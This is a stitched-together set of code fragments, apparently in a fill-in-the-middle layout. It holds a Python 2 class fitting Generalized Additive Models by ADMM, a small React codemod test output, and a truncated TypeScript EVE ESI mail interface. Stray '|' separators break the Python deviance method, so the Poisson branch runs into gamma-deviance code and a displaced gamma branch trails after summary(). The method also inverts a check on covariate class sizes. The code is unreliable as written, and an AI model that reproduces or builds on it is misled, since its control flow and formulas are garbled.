mv['num_obs'] = self._num_obs
mv['y'] = self._y
mv['weights'] = self._weights
mv['has_covariate_classes'] = self._has_covariate_classes
if self._has_covariate_classes:
mv['covariate_class_sizes'] = self._covariate_class_sizes
mv['f_bar'] = self.f_bar
mv['z_bar'] = self.z_bar
mv['u'] = self.u
mv['prim_res'] = self.prim_res
mv['dual_res'] = self.dual_res
mv['prim_tol'] = self.prim_tol
mv['dual_tol'] = self.dual_tol
mv['dev'] = self.dev
filename = '{0:s}_model.pckl'.format(self._name)
f = open(filename, 'w')
pickle.dump(mv, f)
f.close()
def _load(self, filename):
"""Load state.
Load a model from file to make predictions.
"""
f = open(filename)
mv = pickle.load(f)
f.close()
self._filename = filename
self._family = mv['family']
self._link = mv['link']
self._known_dispersion = mv['known_dispersion']
if self._known_dispersion:
self._dispersion = mv['dispersion']
self._estimate_overdispersion = mv['estimate_overdispersion']
self._offset = mv['offset']
self._num_features = mv['num_features']
self._fitted = mv['fitted']
self._name = mv['name']
self._features = {}
features = mv['features']
for (name, feature) in features.iteritems():
if feature['type'] == 'categorical':
self._features[name] = _CategoricalFeature(load_from_file=feature['filename'])
elif feature['type'] == 'linear':
self._features[name] = _LinearFeature(load_from_file=feature['filename'])
elif feature['type'] == 'spline':
self._features[name] = _SplineFeature(load_from_file=feature['filename'])
else:
raise ValueError('Invalid feature type')
# self._rho = mv['rho']
self._num_obs = mv['num_obs']
self._y = mv['y']
self._weights = mv['weights']
self._has_covariate_classes = mv['has_covariate_classes']
if self._has_covariate_classes:
self._covariate_class_sizes = mv['covariate_class_sizes']
self.f_bar = mv['f_bar']
self.z_bar = mv['z_bar']
self.u = mv['u']
self.prim_res = mv['prim_res']
self.dual_res = mv['dual_res']
self.prim_tol = mv['prim_tol']
self.dual_tol = mv['dual_tol']
self.dev = mv['dev']
if self._link == 'identity':
self._eval_link = lambda x: x
self._eval_inv_link = lambda x: x
elif self._link == 'logistic':
self._eval_link = lambda x: np.log( x / (1. - x) )
self._eval_inv_link = lambda x: np.exp(x) / (1 + np.exp(x))
elif self._link == 'probit':
# Inverse CDF of the Gaussian distribution
self._eval_link = lambda x: stats.norm.ppf(x)
self._eval_inv_link = lambda x: stats.norm.cdf(x)
elif self._link == 'complementary_log_log':
self._eval_link = lambda x: np.log(-np.log(1. - x))
self._eval_inv_link = lambda x: 1. - np.exp(-np.exp(x))
elif self._link == 'log':
self._eval_link = lambda x: np.log(x)
self._eval_inv_link = lambda x: np.exp(x)
elif self._link == 'reciprocal':
self._eval_link = lambda x: 1. / x
self._eval_inv_link = lambda x: 1. / x
elif self._link == 'reciprocal_squared':
self._eval_link = lambda x: 1. / (x * x)
self._eval_inv_link = lambda x: 1. / np.sqrt(x)
def add_feature(self, name, type, transform=None, rel_dof=None, regularization=None):
"""Add a feature
Add a feature to a Generalized Additive Model. (An implicit
constant feature is always included, representing the overall
average response.)
Parameters
----------
name : str
Name for feature. Used internally to keep track of
features and is also used when saving files and in
plots.
type : str
Type of feature. Currently supported options include:
'categorical' (for categorical variables)
'linear' (for variables with a linear contribution
to the response)
'spline' (for variables with a potentially nonlinear
contribution to the response).
Other types of features worth supporting include
piecewise constant functions and monotonic functions.
Those might end up being regularization terms.
transform : function or None
Optional transform applied to feature data, saving
the user from repetitive boilerplate code. Any function
may be used; it is applied to data provided during fitting
and prediction. Common options might include np.log, np.log1p,
or np.sqrt. The user may wish to start with a base feature
like 'age' and use derived features 'age_linear', 'age_quadratic'
to permit quadratic models for that feature, with potentially
different regularization applied to each.
rel_dof : float or None
Relative degrees of freedom. Applicable only to spline features.
The degrees of freedom associated with a spline represent how
"wiggly" it is allowed to be. A spline with two degrees of freedom
is just a line. (Actually, since these features are constrained
to have zero mean response over the data, linear features
only have one degree of freedom.) The relative degrees of freedom
are used to specify the baseline smoothing parameter (lambda)
associated with a feature. When the model is fit to data, the user
can specify an overall smoothing parameter applied to all features
to alter the amount of regularization in the entire model. Thus
the actual degrees of freedom will vary based on the amount of
smoothing. The idea is that the analyst may wish to permit some
features to be more wiggly than others. By default, all
splines have 4 relative degrees of freedom.
Regularization of any feature effectively reduces the degrees of
freedom, and so this term is potentially applicable, but that is
not yet supported.
regularization : dictionary or None
Dictionary specifying the regularization applied to this feature.
Different types of features support different types of regularization.
Splines implicitly only support regularization of the wiggliness
via a C2 smoothness penalty. That is controlled via the rel_dof.
Other features have more diverse options described in their own
documentation.
Returns
-------
(nothing)
"""
if type == 'categorical':
f = _CategoricalFeature(name, regularization=regularization)
elif type == 'linear':
f = _LinearFeature(name, transform, regularization=regularization)
elif type == 'spline':
f = _SplineFeature(name, transform, rel_dof)
else:
raise ValueError('Features of type {} not supported.'.format(type))
self._features[name] = f
self._num_features += 1
def fit(self, X, y, covariate_class_sizes=None, weights=None,
optimizer='admm', smoothing=1., save_flag=False,
verbose=False, plot_convergence=False, max_its=100):
"""Fit a Generalized Additive Model to data.
Note regarding binomial families: many data sets include
multiple observations having identical features. For example,
imagine a data set with features 'gender', and 'country' and
binary response indicating whether the person died (morbid but
common in biostatistics). The data might look like this:
gender country patients survivors
M USA 50 48
F USA 70 65
M CAN 40 38
F CAN 45 43
This still describes a binomial family, but in a more compact
format than specifying each individual user. We eventually
want to support this more compact format, but we do not
currently! In this context, it is important to check for
over-dispersion (see [GLM]), and I need to learn more first.
In the current implementation, we assume that there is no
over-dispersion, and that the number of users having the
same set of features is small.
Parameters
----------
X : pandas dataframe
Dataframe of features. The column names must correspond
to the names of features added to the model. X may have
extra columns corresponding to features not included in
the model; these are simply ignored. Where applicable,
the data should be "pre-transformation", since this code
will apply any transformations specified in .add_feature.
y : array
Response. Depending on the model family, the response
may need to be in a particular form (for example, for
a binomial family, the y's should be either 0 or 1),
but this is not checked anywhere!
covariate_class_sizes : array or None.
If observations are grouped into covariance classes, the
size of those classes should be listed in this input.
w : array
Weights applied to each observation. This is effectively
specifying the dispersion of each observation.
optimizer : string
We use the Alternating Direction Method of Multipliers
('admm') to fit the model. We may eventually support more
methods, but right now this option does nothing.
smoothing : float
Smoothing to apply to entire model, used in conjunction
with other regularization parameters. That is, whatever
regularization is used for the various features, is
scaled by this term, allowing the user to set the overall
smoothing by Cross Validation or whatever they like. This
allows the user to specify different regularization for
each feature, while still permitting a one-dimensional
family of models corresponding to different amounts of
regularization. Defaults to 1., leaving the regularization
as specified in .add_feature().
save_flag : boolean
Specifies whether to save intermediate results after each
iteration. Useful for complicated models with massive
data sets that take a while to fit. If the system crashes
during the fit, the analyst can pick up where they left
off instead of starting from scratch. Defaults to False.
verbose : boolean
Specifies whether to print mildly useful information to
the screen during the fit. Defaults to False.
plot_convergence : boolean
Specifies whether to plot the convergence graph at the
end. (I suspect only Convex Optimization nerds like me
want to see this.) Defaults to False.
max_its : integer
Maximum number of iterations. Defaults to 100.
Returns
-------
(nothing)
"""
if save_flag and self._name is None:
msg = 'Cannot save a GAM with no name.'
msg += ' Specify name when instantiating model.'
raise ValueError(msg)
if len(X) != len(y):
raise ValueError('Inconsistent number of observations in X and y.')
num_threads = 1
self._rho = 0.1
eps_abs = 1e-3
eps_rel = 1e-3
# Note that X may include columns that do not correspond to features in our model
# (for example, if the user is experimenting with leaving out features to assess
# importance). Thus, the real number of features is self._num_features, not
# num_features as in the next line.
self._num_obs, num_features = X.shape
self._y = y.flatten()
self._weights = weights
if covariate_class_sizes is not None:
self._has_covariate_classes = True
self._covariate_class_sizes = covariate_class_sizes
mean_response = float(np.sum(self._y)) / np.sum(self._covariate_class_sizes)
self._offset = self._eval_link(mean_response)
else:
self._has_covariate_classes = False
self._covariate_class_sizes = None
self._offset = self._eval_link(np.mean(self._y))
fj = {}
for name, feature in self._features.iteritems():
feature.initialize(X[name].values, smoothing=smoothing,
covariate_class_sizes=self._covariate_class_sizes,
save_flag=save_flag, save_prefix=self._name)
fj[name] = np.zeros(self._num_obs)
self.f_bar = np.full((self._num_obs,), self._offset / self._num_features)
self.z_bar = np.zeros(self._num_obs)
self.u = np.zeros(self._num_obs)
self.prim_res = []
self.dual_res = []
self.prim_tol = []
self.dual_tol = []
self.dev = []
z_new = np.zeros(self._num_obs)
if num_threads > 1:
p = mp.Pool(num_threads)
else:
p = None
for i in range(max_its):
if verbose:
print 'Iteration {0:d}'.format(i)
print 'Optimizing primal variables'
fpumz = self._num_features * (self.f_bar + self.u - self.z_bar)
fj_new = {}
f_new = np.full((self._num_obs,), self._offset)
if False: #num_threads > 1:
# Getting python to run a for loop in parallel
# might as well be impossible :-(
args = [(i, self._features[i], fpumz, self._rho) for i in self._features.keys()]
results = p.map(_feature_wrapper, args)
for i in results:
fj_new[i[0]] = i[1]
f_new += i[1]
else:
for name, feature in self._features.iteritems():
if verbose:
print 'Optimizing {0:s}'.format(name)
fj_new[name] = feature.optimize(fpumz, self._rho)
f_new += fj_new[name]
f_new /= self._num_features
if verbose:
print 'Optimizing dual variables'
z_new = self._optimize(self.u + f_new, self._num_features, p)
self.u += f_new - z_new
prim_res = np.sqrt(self._num_features) * linalg.norm(f_new - z_new)
dual_res = 0.0
norm_ax = 0.0
norm_bz = 0.0
norm_aty = 0.0
num_params = 0
for name, feature in self._features.iteritems():
dr = ((fj_new[name] - fj[name])
+ (z_new - self.z_bar)
- (f_new - self.f_bar))
dual_res += dr.dot(dr)
norm_ax += fj_new[name].dot(fj_new[name])
zik = fj_new[name] + z_new - f_new
norm_bz += zik.dot(zik)
norm_aty += feature.compute_dual_tol(self.u)
num_params += feature.num_params()
dual_res = self._rho * np.sqrt(dual_res)
norm_ax = np.sqrt(norm_ax)
norm_bz = np.sqrt(norm_bz)
norm_aty = np.sqrt(norm_aty)
self.f_bar = f_new
fj = fj_new
self.z_bar = z_new
if self._has_covariate_classes:
sccs = np.sum(self._covariate_class_sizes)
prim_tol = (np.sqrt(sccs * self._num_features) * eps_abs
+ eps_rel * np.max([norm_ax, norm_bz]))
else:
prim_tol = (np.sqrt(self._num_obs * self._num_features) * eps_abs
+ eps_rel * np.max([norm_ax, norm_bz]))
dual_tol = np.sqrt(num_params) * eps_abs + eps_rel * norm_aty
self.prim_res.append(prim_res)
self.dual_res.append(dual_res)
self.prim_tol.append(prim_tol)
self.dual_tol.append(dual_tol)
self.dev.append(self.deviance())
if prim_res < prim_tol and dual_res < dual_tol:
if verbose:
print 'Fit converged'
break
else:
if verbose:
print 'Fit did not converge'
if num_threads > 1:
p.close()
p.join()
self._fitted = True
if save_flag:
self._save()
if plot_convergence:
_plot_convergence(self.prim_res, self.prim_tol, self.dual_res,
self.dual_tol, self.dev)
def _optimize(self, upf, N, p=None):
"""Optimize \bar{z}.
Solves the optimization problem:
minimize L(N*z) + \rho/2 * \| N*z - N*u - N*\bar{f} \|_2^2
where z is the variable, N is the number of features, u is the scaled
dual variable, \bar{f} is the average feature response, and L is
the likelihood function which is different depending on the
family and link function. This is accomplished via a proximal
operator, as discussed in [GAMADMM]:
prox_\mu(v) := argmin_x L(x) + \mu/2 * \| x - v \|_2^2
I strongly believe that paper contains a typo in this equation, so we
return (1. / N) * prox_\mu (N * (u + \bar{f}) with \mu = \rho instead
of \mu = \rho / N as in [GAMADMM]. When implemented as in the paper,
convergence was much slower, but it did still converge.
Certain combinations of family and link function result in proximal
operators with closed form solutions, making this step *very* fast
(e.g. 3 flops per observation).
Parameters
----------
upf : array
Vector representing u + \bar{f}
N : integer
Number of features.
p : Multiprocessing Pool (optional)
If multiple threads are available, massive data sets may
benefit from solving this optimization problem in parallel.
It is up to the individual functions to decide whether to
actually do this.
Returns
-------
z : array
Result of the above optimization problem.
"""
prox = None
if self._family == 'normal':
if self._link == 'identity':
prox = po._prox_normal_identity
else:
prox = po._prox_normal
elif self._family == 'binomial':
if self._link == 'logistic':
prox = po._prox_binomial_logit
else:
prox = po._prox_binomial
if self._has_covariate_classes:
return (1. / N) * prox(N*upf, self._rho, self._y,
self._covariate_class_sizes,
self._weights, self._eval_inv_link, p=p)
elif self._family == 'poisson':
if self._link == 'log':
prox = po._prox_poisson_log
else:
prox = po._prox_poisson
elif self._family == 'gamma':
if self._link == 'reciprocal':
prox = po._prox_gamma_reciprocal
else:
prox = po._prox_gamma
elif self._family == 'inverse_gaussian':
if self._link == 'reciprocal_squared':
prox = po._prox_inv_gaussian_reciprocal_squared
else:
prox = po._prox_inv_gaussian
else:
msg = 'Family {0:s} and Link Function {1:s} not (yet) supported.'
raise ValueError(msg.format(self._family, self._link))
return (1. / N) * prox(N*upf, self._rho, self._y, w=self._weights,
inv_link=self._eval_inv_link, p=p)
def predict(self, X):
"""Apply fitted model to features.
Parameters
----------
X : pandas dataframe
Data for which we wish to predict the response. The
column names must correspond to the names of the
features used to fit the model. X may have extra
columns corresponding to features not in the model;
these are simply ignored. Where applicable, the data
should be "pre-transformation", since this code will
apply any transformations specified while defining
the model.
Returns
-------
mu : array
Predicted mean response for each data point.
"""
if not self._fitted:
raise AttributeError('Model not yet fit.')
num_points, m = X.shape
eta = np.full((num_points,), self._offset)
for name, feature in self._features.iteritems():
eta += feature.predict(X[name].values)
return self._eval_inv_link(eta)
def confidence_intervals(self, X, prediction=False, width=0.95):
"""Confidence intervals on predictions.
NOT YET IMPLEMENTED
There are two notions of confidence intervals that are
appropriate. The first is a confidence interval on mu,
the mean response. This follows from the uncertainty
associated with the fit model. The second is a confidence
interval on observations of this model. The distinction
is best understood by example. For a Gaussian family,
the model might be a perfect fit to the data, and we
may have billions of observations, so we know mu perfectly.
Confidence intervals on the mean response would be very
small. But the response is Gaussian with a non-zero
variance, so observations will in general still be spread
around the mean response. A confidence interval on the
prediction would be larger.
Now consider a binomial family. The estimated mean response
will be some number between 0 and 1, and we can estimate
a confidence interval for that mean. But the observed
response is always either 0 or 1, so it doesn't make sense
to talk about a confidence interval on the prediction
(except in some pedantic sense perhaps).
Note that if we are making multiple predictions, it makes
sense to talk about a "global" set of confidence intervals.
Such a set has the property that *all* predictions fall
within their intervals with specified probability. This
function does not compute global confidence intervals!
Instead each confidence interval is computed "in vacuo".
Parameters
----------
X : pandas dataframe
Data for which we wish to predict the response. The
column names must correspond to the names of the
features used to fit the model. X may have extra
columns corresponding to features not in the model;
these are simply ignored. Where applicable, the data
should be "pre-transformation", since this code will
apply any transformations specified while defining
the model.
prediction : boolean
Specifies whether to return a confidence interval
on the mean response or on the predicted response.
(See above.) Defaults to False, leading to a
confidence interval on the mean response.
width : float between 0 and 1
Desired confidence width. Defaults to 0.95.
Returns
-------
mu : (n x 2) array
Lower and upper bounds on the confidence interval
associated with each prediction.
"""
pass
def plot(self, name, true_fn=None):
"""Plot the component of the modelf for a particular feature.
Parameters
----------
name : str
Name of feature (must be a feature in the model).
true_fn : function or None (optional)
Function representing the "true" relationship
between the feature and the response.
Returns
-------
(nothing)
"""
self._features[name]._plot(true_fn=true_fn)
def deviance(self, X=None, y=None, covariate_class_sizes=None, w=None):
"""Deviance
This function works in one of two ways:
Firstly, it computes the deviance of the model, defined as
2 * \phi * (\ell(y; y) - \ell(\mu; y))
where \phi is the dispersion (which is only in this equation
to cancel out the denominator of the log-likelihood),
\ell(y; y) is the log-likelihood of the model that fits the
data perfectly, and \ell(\mu; y) is the log-likelihood of the
fitted model on the data used to fit the model. This is
the quantity we minimize when fitting the model.
Secondly, it computes the deviance of the model on arbitrary
data sets. This can be used in conjunction with Cross Validation
to choose the smoothing parameter by minimizing the deviance
on the hold-out set.
Parameters
----------
X : pandas dataframe (optional)
Dataframe of features. The column names must correspond
to the names of features added to the model. (See .predict()).
Only applicable for the second use case described above.
y : array (optional)
Response. Only applicable for the second use case.
covariate_class_sizes : array (optional)
Array of covariate class sizes.
w : array (optional)
Weights for observations. Only applicable for the second
use case, but optional even then.
Returns
-------
D : float
The deviance of the model.
"""
if X is None or y is None:
y = self._y
mu = self._eval_inv_link(self._num_features * self.f_bar)
w = self._weights
if self._has_covariate_classes:
m = self._covariate_class_sizes
else:
m = 1.
else:
mu = self.predict(X)
if covariate_class_sizes is None:
m = covariate_class_sizes
else:
m = 1.
if self._family == 'normal':
y_minus_mu = y - mu
if w is None:
return y_minus_mu.dot(y_minus_mu)
else:
return w.dot(y_minus_mu * y_minus_mu)
elif self._family == 'binomial':
if w is None:
return -2. * np.sum( y * np.log(mu) + (m - y) * np.log1p(-mu) )
else:
return -2. * w.dot( y * np.log(mu) + (m - y) * np.log1p(-mu) )
elif self._family == 'poisson':
if w is None:
return 2. * np.sum(y * np.log(y / mu) - (y - mu)) | return 2. * np.sum(-1. * np.log(y / mu) + (y - mu) / mu)
else:
return 2. * w.dot(-1. * np.log(y / mu) + (y - mu) / mu)
elif self._family == 'inverse_gaussian':
if w is None:
return np.sum( (y - mu) * (y - mu) / (mu * mu * y) )
else:
return w.dot( (y - mu) * (y - mu) / (mu * mu * y) )
def dispersion(self, formula='deviance'):
"""Dispersion
Returns the dispersion associated with the model. Depending on
the model family and whether the dispersion was specified by
the user, the dispersion may or may not be known a
priori. This function will estimate this parameter when
appropriate.
There are different ways of estimating this parameter that may
be appropriate for different kinds of families. The current
implementation is based on the deviance, as in Eqn 3.10 on
p. 110 of GAMr. As discussed in that section, this tends not
to work well for Poisson data (with overdispersion) when the
mean response is small. Alternatives are offered in that
section, but I have not yet implemented them. This is not
terribly relevant for the current implementation since
overdispersion is not supported! (When overdispersion is not
present, the dispersion of the Poisson is exactly 1.)
My eventual hope is to understand the appropriate methods for
all the different circumstances and have intelligent defaults
that can be overridden by opinionated users.
Parameters
----------
formula : str
Formula for the dispersion. Options include:
'deviance' (default)
'pearson'
'fletcher'
"""
if self._family == 'normal':
if self._known_dispersion:
return self._dispersion
else:
sigma2 = self.deviance() / (self._num_obs - self.dof())
return sigma2
elif self._family == 'binomial':
if self._known_dispersion:
return self._dispersion
elif self._estimate_overdispersion:
return self._binomial_overdispersion()
else:
return 1.
elif self._family == 'poisson':
return 1.
elif self._family == 'gamma':
if self._known_dispersion:
return self._dispersion
else:
return _gamma_dispersion(self.dof(), self.deviance(), self._num_obs)
# This equation is a first-order approximation valid when nu is
# large (see Section 8.3.6 of [GLM])
#Dbar = self.deviance() / self._num_obs
#return Dbar * (6. + Dbar) / (6. + 2. * Dbar)
elif self._family == 'inverse_gaussian':
if self._known_dispersion:
return self._dispersion
else:
sigma2 = self.deviance() / (self._num_obs - self.dof())
return sigma2
def _binomial_overdispersion(self, formula=None):
"""Over-Dispersion
Parameters
----------
formula : str
Which formula to use, either 'replication' or
'pearson'. See Notes.
Returns
-------
sigma2 : float
Estimate of over-dispersion. This is also saved as the
self._dispersion parameter so we only calculate this once
regardless of how many times this function is called.
Notes
-----
When using covariate classes, the observed variance may exceed
the baseline for the family due to clustering in the
population. See GLM for motivation. That text gives two
methodologies for estimating over-dispersion. When there are
no covariate classes (multiple observations with identical
features), estimating over-dispersion is not possible.
The most reliable assessment of over-dispersion is only
possible when there is replication amongst the covariate
classes. This is best illustrated through example. Suppose we
have data on patients from two hospitals as shown in the table
below. Note that there are 3 rows corresponding to Men in
hospital 1. These entries could of course be pooled to give
the total patients and survivors for this covariate class, but
because they have not, it permits us to estimate
over-dispersion more reliably.
Gender Hospital Patients Survivors
M 1 30 15
M 1 40 19
M 1 35 15
F 1 10 8
M 2 10 3
M 2 18 6
F 2 40 30
Because we are building a model based on gender and hospital
alone, we are assuming that all three entries are drawn from
the same binomial distribution. We could actually test that
hypothesis using, for example, Welch's t-Test. If the result
indicates a significant departure from the null hypothesis,
there must be some (unobserved) explanation for different
survival rates. Perhaps the repeated entries correspond to
different doctors, with some doctors being more effective than
others. Or perhaps the multiple entries refer to different
time periods, like before and after a new treatment was
instituted. Regardless, we can quantify the additional
variance and use it to make (hopefully) more accurate
confidence intervals.
When replication is present, we take the following approach,
per GLM. Suppose a particular covariate class (e.g. Gender=M,
Hospital=1) has r replicates. Across all r replicates,
determine the observed success rate, pi. In our example, we
have 105 patients and 49 survivors, for a total survival rate
of pi = 0.47. Next we compute the variance on r-1 DOF:
1 r (y_j - m_j * pi)^2
s^2 = --- \sum ------------------
r-1 j=1 m_j pi * (1 - pi)
where y_j is the number of successes in the jth replicate, m_j
is the number of trials in the jth replicate, and s^2 is
estimated variance. Per GLM, this is an unbiased estimate of
the dispersion parameter. Filling in our specific numbers, we
get s^2 = 0.17, indicating under-dispersion. (Important note:
these are made up numbers, so there is actually more
consistency in the data than would be exhibited from a true
binomial model. Over-dispersion is more common than
under-dispersion.)
Each covariate class with replication can be used to derive an
estimate of the dispersion parameter. If we expect the
dispersion to be independent of the covariate classes (which
may or may not be true), we can pool these estimates, weighted
by the degree of replication. If the kth covariate class has
r_k replicates and dispersion estimate s_k^2, the overall
estimate of dispersion is:
\sum_k (r_k - 1) * s_k^2
s^2 = -------------------------
\sum_k (r_k - 1)
Another important note: the above formula is *not* present in
GLM. That text just says to pool the estimates, but does not
specify how. This approach makes sense to me, but that doesn't
make it correct!
When replication is not present, or even if the degree of
replication is small, the above methodology breaks
down. Instead, GLM advocates the use of a Pearson-residual
based approach. If pi_j is the model prediction for the jth
covariate class, then we estimate dispersion as:
1 (y_j - m_j * pi_j)^2
s^2 = ----- \sum -----------------------
n - p j m_j * pi_j * (1 - pi_j)
This is similar to the replicate-based formula, but we are
using the model prediction for pi_j instead of the pooled
observations, and we are using the n-p as the error DOF
instead of the number of replicates. This methodology still
breaks down when the sizes of the covariate classes, m_j, are
small.
In order to use the replicate-based formula, there must be at
least one covariate class exhibiting replication, and the
degree of replication must be at least two. If these
conditions are not met, and the user dictates that we use the
replicate-based formula, we simply ignore that directive and
use the Pearson-based approach. (It might be best to issue a
warning in this case, but we do not do that.)
If this function is called without specifying which
methodology to use, we use the following criteria in assessing
whether there is enough replication to use the first
approach. First, there must be at least two covariate classes
exhibiting replication. Second, the degree of replication of
the most-replicated covariate class must be at least
3. Finally, the total replication degrees of freedom must be
at least 10. For example, in the example data set above, there
are two covariate classes exhibiting replication: Males in
Hospital 1, and Males in Hospital 2, with 3 and 2 degrees of
replication, respectively. The degree of replication of the
most-replicate covariate class is therefore equal to 3. The
degrees of freedom are (2-1) + (3-1) = 3, which is below the
threshold of 10. We would therefore use the Pearson-based
formula in this case.
These criteria are completely arbitrary! I need to do more
research to determine the appropriate criteria.
"""
if not self._has_covariate_classes:
return 1.
min_cc_replicates = 1
min_replication = 2
des_cc_replicates = 2
des_replication = 3
des_replication_dof = 10
# Determine degree of replication
#
# To use the replication formula, we need at least one
# covariate class with replication, and that covariate class
# needs replication of at least 2. It might make sense to use
# a more stringent set of criteria, but this is enough for
# now.
#
# The way we decide whether two observations have the same
# covariate class is by encoding the covariate class by an
# index. Each categorical feature has already indexed each
# category by an internal integer between 0 and n_k - 1, where
# n_k is the number of categories of the kth feature. (None of
# this is applicable unless all the features are categorical.
#
# We use these internal indices along with the numbers of
# categories in conjunction with the numpy ravel_multi_index
# function to map a tuple of category indices into a single
# integer between 0 and the the product of all category sizes
# (minus 1).
#
# We need to take care to loop over the features in a
# consistent order, so we create the fnames array just to give
# an arbitrary but consistent ordering.
r = {}
covariate_class = np.zeros((self._num_obs,))
fnames = self._features.keys()
for i in range(self._num_obs):
multi_index = []
dims = []
for fname in fnames:
cindex, csize = self._features[fname].category_index(i)
multi_index.append(cindex)
dims.append(csize)
cci = np.ravel_multi_index(multi_index, dims)
covariate_class[i] = cci
r[cci] = r.get(cci, 0) + 1
num_cc_with_replicates = 0
max_replication = 0
replication_dof = 0
for j in r.values():
if j > 1:
num_cc_with_replicates += 1
replication_dof += j - 1
if j > max_replication:
max_replication = j
if ((num_cc_with_replicates >= min_cc_replicates
and max_replication >= min_replication)):
has_replication = True
else:
has_replication = False
if ((num_cc_with_replicates >= des_cc_replicates
and max_replication >= des_replication
and replication_dof >= des_replication_dof)):
has_desired_replication = True
else:
has_desired_replication = False
if formula is None:
if has_desired_replication:
formula = 'replication'
else:
formula = 'pearson'
if has_replication and formula == 'replication':
trials = {}
successes = {}
# Initial loop to pool trials/successes.
for i in range(self._num_obs):
cci = covariate_class[i]
trials[cci] = trials.get(cci, 0) + self._covariate_class_sizes[i]
successes[cci] = successes.get(cci, 0) + self._y[i]
# Final loop to compute dispersion
s2 = 0.
for i in range(self._num_obs):
cci = covariate_class[i]
pi = float(successes[cci]) / trials[cci]
num = self._y[i] - self._covariate_class_sizes[i] * pi
denom = self._covariate_class_sizes[i] * pi * (1 - pi)
s2 += num * num / denom
# Divide by the error DOF
s2 /= replication_dof
self._known_dispersion = True
self._dispersion = s2
return s2
else:
mu = self._eval_inv_link(self._num_features * self.f_bar)
m = self._covariate_class_sizes
bl_var = np.multiply(mu, 1. - mu)
res = self._y - np.multiply(m, mu)
num = np.multiply(res, res)
denom = np.multiply(m, bl_var)
n_minus_p = self._num_obs - self.dof()
s2 = np.sum(np.divide(num, denom)) / n_minus_p
self._known_dispersion = True
self._dispersion = s2
return s2
def dof(self):
"""Degrees of Freedom
Returns the degrees of freedom associated with this model.
Simply adds up the degrees of freedom associated with each
feature.
"""
dof = 1. # Affine factor
for name, feature in self._features.iteritems():
dof += feature.dof()
return dof
def aic(self):
"""Akaike Information Criterion
Returns the AIC for the fitted model, useful for choosing
smoothing parameters. The AIC we compute is actually off
by a constant factor, making it easier to compute without
detracting from its role in model selection.
Different authors seem to throw in multiplicative or additive
factors willy-nilly since it doesn't affect model selection.
"""
p = self.dof()
if not self._known_dispersion:
# If we are estimating the dispersion, we need to
# add one to the DOF.
p += 1
# Note that the deviance is twice the dispersion times the
# log-likelihood, so no factor of two required there.
return self.deviance() / self.dispersion() + 2. * p
# return (self.deviance() / self._num_obs
# + 2. * p * self.dispersion() / self._num_obs)
def aicc(self):
# Eqn 6.32 on p. 304 of [GAMr]
pass
def ubre(self, gamma=1.0):
"""Un-Biased Risk Estimator
Returns the Un-Biased Risk Estimator as discussed in Sections
6.2.1 and 6.2.5 of [GAMr]. This can be used for choosing the
smoothing parameter when the dispersion is known.
As discussed in Section 6.2.5 of [GAMr], sometimes it is helpful
to force smoother fits by exaggerating the effective degrees of
freedom. In that case, a value of gamma > 1. may be desirable.
"""
return self.deviance() + 2. * gamma * self.dispersion() * self.dof()
def gcv(self, gamma=1.0):
"""Generalized Cross Validation
This function returns the Generalized Cross Validation (GCV)
score, which can be used for choosing the smoothing parameter
when the dispersion is unknown.
As discussed in Section 6.2.5 of [GAMr], sometimes it is helpful
to force smoother fits by exaggerating the effective degrees of
freedom. In that case, a value of gamma > 1. may be desirable.
"""
denom = self._num_obs - gamma * self.dof()
return self._num_obs * self.deviance() / (denom * denom)
def summary(self):
"""Print summary statistics associated with fitted model.
Prints statistics for the overall model, as well as for
each individual feature (see the __str__() function in
each feature type for details about what is printed
there).
For the overall model, the following are printed:
phi: Estimated dispersion parameter. Omitted
if specified or if it is known for the
Family (e.g. Poisson).
edof: Estimated degrees of freedom.
Deviance: The difference between the log-likelihood of
the model that fits the data perfectly and
that of the fitted model, times twice the
dispersion.
AIC: Akaike Information Criterion.
AICc: AIC with correction for finite data sets.
UBRE: Unbiased Risk Estimator (if dispersion is known).
GCV: Generalized Cross Validation (if dispersion is estimated).
For more details on these parameters, see the documentation
in the corresponding functions. It may also be helpful to
include an R^2 value where appropriate, and perhaps a p-value
for the model against the null model having just the affine
term. It would also be nice to have confidence intervals
at least on the estimated dispersion parameter.
"""
print 'Model Statistics'
print '----------------'
if not self._known_dispersion:
print 'phi: {0:0.06g}'.format(self.dispersion())
print 'edof: {0:0.0f}'.format(self.dof())
print 'Deviance: {0:0.06g}'.format(self.deviance())
print 'AIC: {0:0.06g}'.format(self.aic())
#print 'AICc: {0:0.06g}'.format(aicc)
if self._known_dispersion:
print 'UBRE: {0:0.06g}'.format(self.ubre())
else:
print 'GCV: {0:0.06g}'.format(self.gcv())
print ''
print 'Features'
print '--------'
for name, feature in self._features.iteritems():
print feature.__str__() | else:
return 2. * w.dot(y * np.log(y / mu) - (y - mu))
elif self._family == 'gamma':
if w is None: |
toast-change-color-prop.output.js | // @flow strict
import React from 'react';
import { Box, Toast, Toast as Renamed } from 'gestalt';
export default function | () {
return (
<Box>
<Toast text="Simple Toast" />
<Toast text="Simple Toast" color="red"/>
<Toast text="Simple Toast" />
<Toast text="Simple Toast" />
<Renamed text="Simple Toast" />
</Box>
);
}
| TestBox |
mail.ts | import {
PaginatedLoader, makeIDBasedLoader
} from '../../internal/page-loader';
import { SSOAgent } from '../../internal/esi-agent';
import { Responses, esi } from '../../../gen/esi';
/**
* An api adapter over the end points handling a specific message in a
* character's inbox via functions in the
* [mail](https://esi.evetech.net/latest/#/Mail) ESI endpoints.
*/
export interface Message {
/**
* @esi_example esi.characters(1, 'token').mail(2).info()
*
* @returns The full message content
*/
info(): Promise<Responses['get_characters_character_id_mail_mail_id']>;
/**
* @esi_example esi.characters(1, 'token').mail(2).del()
*
* @returns An empty promise that resolves after the message has been deleted
*/
del(): Promise<Responses['delete_characters_character_id_mail_mail_id']>;
/**
* @esi_example esi.characters(1, 'token').mail(2).update({...})
*
* @param state The new labels and read status for the message
* @return An empty promise that resolves after the message has been updated
*/
update(state: esi.character.mail.MailUpdate): Promise<Responses['put_characters_character_id_mail_mail_id']>;
/**
* @returns The message id
*/
id(): Promise<number>;
}
/**
* An api adapter over the end points handling a specific label in a
* character's inbox via functions in the
* [mail](https://esi.evetech.net/latest/#/Mail) ESI endpoints.
*/
export interface Label {
/**
* @esi_example esi.characters(1, 'token').mail.labels(2).del()
*
* @returns An empty promise that resolves after the label has been deleted
*/
del(): Promise<Responses['delete_characters_character_id_mail_labels_label_id']>;
/**
* @returns The label's id
*/
id(): Promise<number>;
}
/**
* An api adapter over the end points handling all labels in the character's
* inbox via functions in the [mail](https://esi.evetech.net/latest/#/Mail) ESI
* endpoints.
*/
export interface Labels {
/**
* Get a Label instance corresponding to the given label `id`.
